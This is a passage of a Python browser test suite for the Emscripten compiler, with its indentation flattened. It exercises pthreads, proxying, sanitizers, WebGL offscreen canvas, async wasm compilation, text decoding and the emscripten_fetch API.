create_test_file('shell2.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.worker.js") return "cdn/test.worker.js"; else return filename; }, '))
self.compile_btest(['main.cpp', '--shell-file', 'shell2.html', '-s', 'WASM=0', '-s', 'IN_TEST_HARNESS', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-o', 'test2.html'])
try_delete('test.worker.js')
self.run_browser('test2.html', '', '/report_result?1')
# Test that if the main thread is performing a futex wait while a pthread needs it to do a proxied operation (before that pthread would wake up the main thread), that it's not a deadlock.
@requires_threads
def test_pthread_proxying_in_futex_wait(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_proxying_in_futex_wait.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test that sbrk() operates properly in multithreaded conditions
@requires_threads
def test_pthread_sbrk(self):
for aborting_malloc in [0, 1]:
print('aborting malloc=' + str(aborting_malloc))
# With aborting malloc = 1, test allocating memory in threads
# With aborting malloc = 0, allocate so much memory in threads that some of the allocations fail.
self.btest(path_from_root('tests', 'pthread', 'test_pthread_sbrk.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'ABORTING_MALLOC=' + str(aborting_malloc), '-DABORTING_MALLOC=' + str(aborting_malloc), '-s', 'INITIAL_MEMORY=128MB'])
# Test that -s ABORTING_MALLOC=0 works in both pthreads and non-pthreads builds. (sbrk fails gracefully)
@requires_threads
def test_pthread_gauge_available_memory(self):
for opts in [[], ['-O2']]:
for args in [[], ['-s', 'USE_PTHREADS']]:
self.btest(path_from_root('tests', 'gauge_available_memory.cpp'), expected='1', args=['-s', 'ABORTING_MALLOC=0'] + args + opts)
# Test that the proxying operations of user code from pthreads to main thread work
@requires_threads
def test_pthread_run_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_on_main_thread.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test how a lot of back-to-back called proxying operations behave.
@requires_threads
def test_pthread_run_on_main_thread_flood(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_on_main_thread_flood.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test that it is possible to asynchronously call a JavaScript function on the main thread.
@requires_threads
def test_pthread_call_async(self):
self.btest(path_from_root('tests', 'pthread', 'call_async.c'), expected='1', args=['-s', 'USE_PTHREADS'])
# Test that it is possible to synchronously call a JavaScript function on the main thread and get a return value back.
@requires_threads
def test_pthread_call_sync_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-DPROXY_TO_PTHREAD=1', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js'), '-s', 'EXPORTED_FUNCTIONS=[_main,_malloc]'])
# Test that it is possible to asynchronously call a JavaScript function on the main thread.
@requires_threads
def test_pthread_call_async_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-DPROXY_TO_PTHREAD=1', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
# Tests that spawning a new thread does not cause a reinitialization of the global data section of the application memory area.
@requires_threads
def test_pthread_global_data_initialization(self):
mem_init_modes = [[], ['--memory-init-file', '0'], ['--memory-init-file', '1']]
for mem_init_mode in mem_init_modes:
for args in [['-s', 'MODULARIZE', '-s', 'EXPORT_NAME=MyModule', '--shell-file', path_from_root('tests', 'shell_that_launches_modularize.html')], ['-O3']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_global_data_initialization.c'), expected='20', args=args + mem_init_mode + ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'PTHREAD_POOL_SIZE'])
@requires_threads
@requires_sync_compilation
def test_pthread_global_data_initialization_in_sync_compilation_mode(self):
mem_init_modes = [[], ['--memory-init-file', '0'], ['--memory-init-file', '1']]
for mem_init_mode in mem_init_modes:
args = ['-s', 'WASM_ASYNC_COMPILATION=0']
self.btest(path_from_root('tests', 'pthread', 'test_pthread_global_data_initialization.c'), expected='20', args=args + mem_init_mode + ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'PTHREAD_POOL_SIZE'])
# Test that emscripten_get_now() reports coherent wallclock times across all pthreads, instead of each pthread independently reporting wallclock times since the launch of that pthread.
@requires_threads
def test_pthread_clock_drift(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_clock_drift.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
def test_pthread_utf8_funcs(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_utf8_funcs.cpp'), expected='0', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test the emscripten_futex_wake(addr, INT_MAX); functionality to wake all waiters
@requires_threads
def test_pthread_wake_all(self):
self.btest(path_from_root('tests', 'pthread', 'test_futex_wake_all.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'INITIAL_MEMORY=64MB', '-s', 'NO_EXIT_RUNTIME'], also_asmjs=True)
# Test that stack base and max correctly bound the stack on pthreads.
@requires_threads
def test_pthread_stack_bounds(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_stack_bounds.cpp'), expected='1', args=['-s', 'USE_PTHREADS'])
# Test that real `thread_local` works.
@requires_threads
def test_pthread_tls(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_tls.cpp'), expected='1337', args=['-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS'])
# Test that real `thread_local` works in main thread without PROXY_TO_PTHREAD.
@requires_threads
def test_pthread_tls_main(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_tls_main.cpp'), expected='1337', args=['-s', 'USE_PTHREADS'])
@requires_threads
def test_pthread_safe_stack(self):
# Note that as the test runs with PROXY_TO_PTHREAD, we set TOTAL_STACK,
# and not DEFAULT_PTHREAD_STACK_SIZE, as the pthread for main() gets the
# same stack size as the main thread normally would.
self.btest(path_from_root('tests', 'core', 'test_safe_stack.c'), expected='1', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'STACK_OVERFLOW_CHECK=2', '-s', 'TOTAL_STACK=64KB', '--pre-js', path_from_root('tests', 'pthread', 'test_safe_stack.js')])
@parameterized({
'leak': ['test_pthread_lsan_leak', ['-g4']],
'no_leak': ['test_pthread_lsan_no_leak'],
})
@requires_threads
def test_pthread_lsan(self, name, args=[]):
self.btest(path_from_root('tests', 'pthread', name + '.cpp'), expected='1', args=['-fsanitize=leak', '-s', 'INITIAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '--pre-js', path_from_root('tests', 'pthread', name + '.js')] + args)
@parameterized({
# Reusing the LSan test files for ASan.
'leak': ['test_pthread_lsan_leak', ['-g4']],
'no_leak': ['test_pthread_lsan_no_leak'],
})
@requires_threads
def test_pthread_asan(self, name, args=[]):
self.btest(path_from_root('tests', 'pthread', name + '.cpp'), expected='1', args=['-fsanitize=address', '-s', 'INITIAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '--pre-js', path_from_root('tests', 'pthread', name + '.js')] + args)
@requires_threads
def test_pthread_asan_use_after_free(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_asan_use_after_free.cpp'), expected='1', args=['-fsanitize=address', '-s', 'INITIAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '--pre-js', path_from_root('tests', 'pthread', 'test_pthread_asan_use_after_free.js')])
@requires_threads
def test_pthread_exit_process(self):
args = ['-s', 'USE_PTHREADS',
'-s', 'PROXY_TO_PTHREAD',
'-s', 'PTHREAD_POOL_SIZE=2',
'-s', 'EXIT_RUNTIME',
'-DEXIT_RUNTIME',
'-O0']
args += ['--pre-js', path_from_root('tests', 'core', 'pthread', 'test_pthread_exit_runtime.pre.js')]
self.btest(path_from_root('tests', 'core', 'pthread', 'test_pthread_exit_runtime.c'), expected='onExit status: 42', args=args)
@requires_threads
def test_pthread_no_exit_process(self):
# Same as above but without EXIT_RUNTIME. In this case we don't expect onExit to
# ever be called.
args = ['-s', 'USE_PTHREADS',
'-s', 'PROXY_TO_PTHREAD',
'-s', 'PTHREAD_POOL_SIZE=2',
'-O0']
args += ['--pre-js', path_from_root('tests', 'core', 'pthread', 'test_pthread_exit_runtime.pre.js')]
self.btest(path_from_root('tests', 'core', 'pthread', 'test_pthread_exit_runtime.c'), expected='43', args=args)
# Tests MAIN_THREAD_EM_ASM_INT() function call signatures.
def test_main_thread_em_asm_signatures(self):
self.btest_exit(path_from_root('tests', 'core', 'test_em_asm_signatures.cpp'), expected='121', args=[])
@requires_threads
def test_main_thread_em_asm_signatures_pthreads(self):
self.btest_exit(path_from_root('tests', 'core', 'test_em_asm_signatures.cpp'), expected='121', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'ASSERTIONS'])
@requires_threads
def test_main_thread_async_em_asm(self):
self.btest_exit(path_from_root('tests', 'core', 'test_main_thread_async_em_asm.cpp'), expected=0, args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'ASSERTIONS'])
@requires_threads
def test_main_thread_em_asm_blocking(self):
create_test_file('page.html',
open(path_from_root('tests', 'browser', 'test_em_asm_blocking.html')).read())
self.compile_btest([path_from_root('tests', 'browser', 'test_em_asm_blocking.cpp'), '-O2', '-o', 'wasm.js', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
self.run_browser('page.html', '', '/report_result?8')
# Test that it is possible to send a signal via calling alarm(timeout), which in turn calls to the signal handler set by signal(SIGALRM, func);
def test_sigalrm(self):
self.btest(path_from_root('tests', 'sigalrm.cpp'), expected='0', args=['-O3'])
def test_canvas_style_proxy(self):
self.btest('canvas_style_proxy.c', expected='1', args=['--proxy-to-worker', '--shell-file', path_from_root('tests/canvas_style_proxy_shell.html'), '--pre-js', path_from_root('tests/canvas_style_proxy_pre.js')])
def test_canvas_size_proxy(self):
self.btest(path_from_root('tests', 'canvas_size_proxy.c'), expected='0', args=['--proxy-to-worker'])
def test_custom_messages_proxy(self):
self.btest(path_from_root('tests', 'custom_messages_proxy.c'), expected='1', args=['--proxy-to-worker', '--shell-file', path_from_root('tests', 'custom_messages_proxy_shell.html'), '--post-js', path_from_root('tests', 'custom_messages_proxy_postjs.js')])
def test_vanilla_html_when_proxying(self):
for opts in [0, 1, 2]:
print(opts)
self.compile_btest([path_from_root('tests', 'browser_test_hello_world.c'), '-o', 'test.js', '-O' + str(opts), '--proxy-to-worker'])
create_test_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
def test_in_flight_memfile_request(self):
# test the XHR for an asm.js mem init file being in flight already
for o in [0, 1, 2]:
print(o)
opts = ['-O' + str(o), '-s', 'WASM=0']
print('plain html')
self.compile_btest([path_from_root('tests', 'in_flight_memfile_request.c'), '-o', 'test.js'] + opts)
create_test_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0') # never when we provide our own HTML like this.
print('default html')
self.btest('in_flight_memfile_request.c', expected='0' if o < 2 else '1', args=opts) # should happen when there is a mem init file (-O2+)
@requires_sync_compilation
def test_binaryen_async(self):
# notice when we use async compilation
script = '''
<script>
// note if we do async compilation
var real_wasm_instantiate = WebAssembly.instantiate;
var real_wasm_instantiateStreaming = WebAssembly.instantiateStreaming;
if (typeof real_wasm_instantiateStreaming === 'function') {
WebAssembly.instantiateStreaming = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiateStreaming(a, b);
};
} else {
WebAssembly.instantiate = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiate(a, b);
};
}
// show stderr for the viewer's fun
err = function(x) {
out('<<< ' + x + ' >>>');
console.log(x);
};
</script>
{{{ SCRIPT }}}
'''
shell_with_script('shell.html', 'shell.html', script)
common_args = ['--shell-file', 'shell.html']
for opts, expect in [
([], 1),
(['-O1'], 1),
(['-O2'], 1),
(['-O3'], 1),
(['-s', 'WASM_ASYNC_COMPILATION'], 1), # force it on
(['-O1', '-s', 'WASM_ASYNC_COMPILATION=0'], 0), # force it off
]:
print(opts, expect)
self.btest_exit('binaryen_async.c', expected=expect, args=common_args + opts)
# Ensure that compilation still works and is async without instantiateStreaming available
no_streaming = ' <script> WebAssembly.instantiateStreaming = undefined;</script>'
shell_with_script('shell.html', 'shell.html', no_streaming + script)
self.btest_exit('binaryen_async.c', expected=1, args=common_args)
# Test that implementing Module.instantiateWasm() callback works.
def test_manual_wasm_instantiate(self):
self.compile_btest([path_from_root('tests/manual_wasm_instantiate.cpp'), '-o', 'manual_wasm_instantiate.js', '-s', 'BINARYEN'])
shutil.copyfile(path_from_root('tests', 'manual_wasm_instantiate.html'), 'manual_wasm_instantiate.html')
self.run_browser('manual_wasm_instantiate.html', 'wasm instantiation succeeded', '/report_result?1')
def test_wasm_locate_file(self):
# Test that it is possible to define "Module.locateFile(foo)" function to locate where worker.js will be loaded from.
ensure_dir('cdn')
create_test_file('shell2.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.wasm") return "cdn/test.wasm"; else return filename; }, '))
self.compile_btest([path_from_root('tests', 'browser_test_hello_world.c'), '--shell-file', 'shell2.html', '-o', 'test.html'])
shutil.move('test.wasm', os.path.join('cdn', 'test.wasm'))
self.run_browser('test.html', '', '/report_result?0')
def test_utf8_textdecoder(self):
self.btest_exit('benchmark_utf8.cpp', 0, args=['--embed-file', path_from_root('tests/utf8_corpus.txt') + '@/utf8_corpus.txt', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["UTF8ToString"]'])
def test_utf16_textdecoder(self):
self.btest_exit('benchmark_utf16.cpp', 0, args=['--embed-file', path_from_root('tests/utf16_corpus.txt') + '@/utf16_corpus.txt', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["UTF16ToString","stringToUTF16","lengthBytesUTF16"]'])
def test_TextDecoder(self):
self.btest('browser_test_hello_world.c', '0', args=['-s', 'TEXTDECODER=0'])
just_fallback = os.path.getsize('test.js')
self.btest('browser_test_hello_world.c', '0')
td_with_fallback = os.path.getsize('test.js')
self.btest('browser_test_hello_world.c', '0', args=['-s', 'TEXTDECODER=2'])
td_without_fallback = os.path.getsize('test.js')
self.assertLess(td_without_fallback, just_fallback)
self.assertLess(just_fallback, td_with_fallback)
def test_small_js_flags(self):
self.btest('browser_test_hello_world.c', '0', args=['-O3', '--closure', '1', '-s', 'INCOMING_MODULE_JS_API=[]', '-s', 'ENVIRONMENT=web'])
# Check an absolute js code size, with some slack.
size = os.path.getsize('test.js')
print('size:', size)
# Note that this size includes test harness additions (for reporting the result, etc.).
self.assertLess(abs(size - 5368), 100)
# Tests that it is possible to initialize and render WebGL content in a pthread by using OffscreenCanvas.
# -DTEST_CHAINED_WEBGL_CONTEXT_PASSING: Tests that it is possible to transfer WebGL canvas in a chain from main thread -> thread 1 -> thread 2 and then init and render WebGL content there.
@no_chrome('see https://crbug.com/961765')
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_in_pthread(self):
for args in [[], ['-DTEST_CHAINED_WEBGL_CONTEXT_PASSING']]:
self.btest('gl_in_pthread.cpp', expected='1', args=args + ['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT', '-lGL'])
# Tests that it is possible to render WebGL content on a <canvas> on the main thread, after it has once been used to render WebGL content in a pthread first
# -DTEST_MAIN_THREAD_EXPLICIT_COMMIT: Test the same (WebGL on main thread after pthread), but by using explicit .commit() to swap on the main thread instead of implicit "swap when rAF ends" logic
@requires_threads
@requires_offscreen_canvas
@disabled('This test is disabled because current OffscreenCanvas does not allow transfering it after a rendering context has been created for it.')
def test_webgl_offscreen_canvas_in_mainthread_after_pthread(self):
for args in [[], ['-DTEST_MAIN_THREAD_EXPLICIT_COMMIT']]:
self.btest('gl_in_mainthread_after_pthread.cpp', expected='0', args=args + ['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT', '-lGL'])
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_only_in_pthread(self):
self.btest('gl_only_in_pthread.cpp', expected='0', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-s', 'OFFSCREENCANVAS_SUPPORT', '-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER'])
# Tests that rendering from client side memory without default-enabling extensions works.
@requires_graphics_hardware
def test_webgl_from_client_side_memory_without_default_enabled_extensions(self):
self.btest('webgl_draw_triangle.c', '0', args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1', '-DDRAW_FROM_CLIENT_MEMORY=1', '-s', 'FULL_ES2=1'])
# Tests for WEBGL_multi_draw extension
# For testing WebGL draft extensions like this, if using chrome as the browser,
# We might want to append the --enable-webgl-draft-extensions to the EMTEST_BROWSER env arg.
@requires_graphics_hardware
def test_webgl_multi_draw(self):
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ARRAYS=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ARRAYS_INSTANCED=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ELEMENTS=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ELEMENTS_INSTANCED=1', '-DEXPLICIT_SWAP=1'])
# Tests for base_vertex/base_instance extension
# For testing WebGL draft extensions like this, if using chrome as the browser,
# We might want to append the --enable-webgl-draft-extensions to the EMTEST_BROWSER env arg.
# If testing on Mac, you also need --use-cmd-decoder=passthrough to get this extension.
# Also there is a known bug with Mac Intel baseInstance which can fail producing the expected image result.
@requires_graphics_hardware
def test_webgl_draw_base_vertex_base_instance(self):
for multiDraw in [0, 1]:
for drawElements in [0, 1]:
self.btest('webgl_draw_base_vertex_base_instance_test.c', reference='webgl_draw_instanced_base_vertex_base_instance.png',
args=['-lGL',
'-s', 'MAX_WEBGL_VERSION=2',
'-s', 'OFFSCREEN_FRAMEBUFFER',
'-DMULTI_DRAW=' + str(multiDraw),
'-DDRAW_ELEMENTS=' + str(drawElements),
'-DEXPLICIT_SWAP=1',
'-DWEBGL_CONTEXT_VERSION=2'])
# Tests that -s OFFSCREEN_FRAMEBUFFER=1 rendering works.
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer(self):
# Tests all the different possible versions of libgl
for threads in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
for version in [[], ['-s', 'FULL_ES3'], ['-s', 'FULL_ES3']]:
args = ['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1'] + threads + version
print('with args: %s' % str(args))
self.btest('webgl_draw_triangle.c', '0', args=args)
# Tests that VAOs can be used even if WebGL enableExtensionsByDefault is set to 0.
@requires_graphics_hardware
def test_webgl_vao_without_automatic_extensions(self):
self.btest('test_webgl_no_auto_init_extensions.c', '0', args=['-lGL', '-s', 'GL_SUPPORT_AUTOMATIC_ENABLE_EXTENSIONS=0'])
# Tests that offscreen framebuffer state restoration works
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer_state_restoration(self):
for args in [
# full state restoration path on WebGL 1.0
['-s', 'MAX_WEBGL_VERSION', '-s', 'OFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH'],
# VAO path on WebGL 1.0
['-s', 'MAX_WEBGL_VERSION'],
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=0'],
# VAO path on WebGL 2.0
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-DTEST_REQUIRE_VAO=1'],
# full state restoration path on WebGL 2.0
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-s', 'OFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH'],
# blitFramebuffer path on WebGL 2.0 (falls back to VAO on Firefox < 67)
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=0'],
]:
cmd = args + ['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1']
self.btest('webgl_offscreen_framebuffer_swap_with_bad_state.c', '0', args=cmd)
# Tests that -s WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG=1 rendering works.
@requires_graphics_hardware
def test_webgl_workaround_webgl_uniform_upload_bug(self):
self.btest('webgl_draw_triangle_with_uniform_color.c', '0', args=['-lGL', '-s', 'WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG'])
# Tests that using an array of structs in GL uniforms works.
@requires_graphics_hardware
def test_webgl_array_of_structs_uniform(self):
self.btest('webgl_array_of_structs_uniform.c', args=['-lGL', '-s', 'MAX_WEBGL_VERSION=2'], reference='webgl_array_of_structs_uniform.png')
# Tests that if a WebGL context is created in a pthread on a canvas that has not been transferred to that pthread, WebGL calls are then proxied to the main thread
# -DTEST_OFFSCREEN_CANVAS=1: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it via using Emscripten's EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES="#canvas", then OffscreenCanvas is used
# -DTEST_OFFSCREEN_CANVAS=2: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it via automatic transferring of Module.canvas when EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES is not defined, then OffscreenCanvas is also used
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_in_proxied_pthread(self):
for asyncify in [0, 1]:
cmd = ['-s', 'USE_PTHREADS', '-s', 'OFFSCREENCANVAS_SUPPORT', '-lGL', '-s', 'GL_DEBUG', '-s', 'PROXY_TO_PTHREAD']
if asyncify:
# given the synchronous render loop here, asyncify is needed to see intermediate frames and
# the gradual color change
cmd += ['-s', 'ASYNCIFY', '-DASYNCIFY']
print(str(cmd))
self.btest('gl_in_proxy_pthread.cpp', expected='1', args=cmd)
@requires_threads
@requires_graphics_hardware
@requires_offscreen_canvas
def test_webgl_resize_offscreencanvas_from_main_thread(self):
for args1 in [[], ['-s', 'PROXY_TO_PTHREAD']]:
for args2 in [[], ['-DTEST_SYNC_BLOCKING_LOOP=1']]:
for args3 in [[], ['-s', 'OFFSCREENCANVAS_SUPPORT', '-s', 'OFFSCREEN_FRAMEBUFFER']]:
cmd = args1 + args2 + args3 + ['-s', 'USE_PTHREADS', '-lGL', '-s', 'GL_DEBUG']
print(str(cmd))
self.btest('resize_offscreencanvas_from_main_thread.cpp', expected='1', args=cmd)
@requires_graphics_hardware
def test_webgl_simple_enable_extensions(self):
for webgl_version in [1, 2]:
for simple_enable_extensions in [0, 1]:
cmd = ['-DWEBGL_CONTEXT_VERSION=' + str(webgl_version),
'-DWEBGL_SIMPLE_ENABLE_EXTENSION=' + str(simple_enable_extensions),
'-s', 'MAX_WEBGL_VERSION=2',
'-s', 'GL_SUPPORT_AUTOMATIC_ENABLE_EXTENSIONS=' + str(simple_enable_extensions),
'-s', 'GL_SUPPORT_SIMPLE_ENABLE_EXTENSIONS=' + str(simple_enable_extensions)]
self.btest('webgl2_simple_enable_extensions.c', expected='0', args=cmd)
# Tests the feature that shell html page can preallocate the typed array and place it
# to Module.buffer before loading the script page.
# In this build mode, the -s INITIAL_MEMORY=xxx option will be ignored.
# Preallocating the buffer in this was is asm.js only (wasm needs a Memory).
def test_preallocated_heap(self):
self.btest_exit('test_preallocated_heap.cpp', expected='0', args=['-s', 'WASM=0', '-s', 'INITIAL_MEMORY=16MB', '-s', 'ABORTING_MALLOC=0', '--shell-file', path_from_root('tests', 'test_preallocated_heap_shell.html')])
# Tests emscripten_fetch() usage to XHR data directly to memory without persisting results to IndexedDB.
def test_fetch_to_memory(self):
# Test error reporting in the negative case when the file URL doesn't exist. (http 404)
self.btest('fetch/to_memory.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-DFILE_DOES_NOT_EXIST'],
also_asmjs=True)
# Test the positive case when the file URL exists. (http 200)
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
for arg in [[], ['-s', 'FETCH_SUPPORT_INDEXEDDB=0']]:
self.btest('fetch/to_memory.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH'] + arg,
also_asmjs=True)
def test_fetch_to_indexdb(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/to_indexeddb.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH'],
also_asmjs=True)
# Tests emscripten_fetch() usage to persist an XHR into IndexedDB and subsequently load up from there.
def test_fetch_cached_xhr(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/cached_xhr.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH'],
also_asmjs=True)
# Tests that response headers get set on emscripten_fetch_t values.
@requires_threads
def test_fetch_response_headers(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/response_headers.cpp', expected='1', args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'], also_asmjs=True)
# Test emscripten_fetch() usage to stream a XHR in to memory without storing the full file in memory
def test_fetch_stream_file(self):
self.skipTest('moz-chunked-arraybuffer was firefox-only and has been removed')
# Strategy: create a large 128MB file, and compile with a small 16MB Emscripten heap, so that the tested file
# won't fully fit in the heap. This verifies that streaming works properly.
s = '12345678'
for i in range(14):
s = s[::-1] + s # length of str will be 2^17=128KB
with open('largefile.txt', 'w') as f:
for i in range(1024):
f.write(s)
self.btest('fetch/stream_file.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'INITIAL_MEMORY=536870912'],
also_asmjs=True)
# Tests emscripten_fetch() usage in synchronous mode when used from the main
# thread proxied to a Worker with -s PROXY_TO_PTHREAD=1 option.
@requires_threads
def test_fetch_sync_xhr(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/sync_xhr.cpp', expected='1', args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Tests emscripten_fetch() usage when user passes none of the main 3 flags (append/replace/no_download).
# In that case, in append is implicitly understood.
@requires_threads
def test_fetch_implicit_append(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/example_synchronous_fetch.cpp', expected='200', args=['-s', 'FETCH', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Tests synchronous emscripten_fetch() usage from wasm pthread in fastcomp.
@requires_threads
def test_fetch_sync_xhr_in_wasm(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/example_synchronous_fetch.cpp', expected='200', args=['-s', 'FETCH', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Tests that the Fetch API works for synchronous XHRs when used with --proxy-to-worker.
@requires_threads
def test_fetch_sync_xhr_in_proxy_to_worker(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/sync_xhr.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '--proxy-to-worker'],
also_asmjs=True)
# Tests waiting on EMSCRIPTEN_FETCH_WAITABLE request from a worker thread
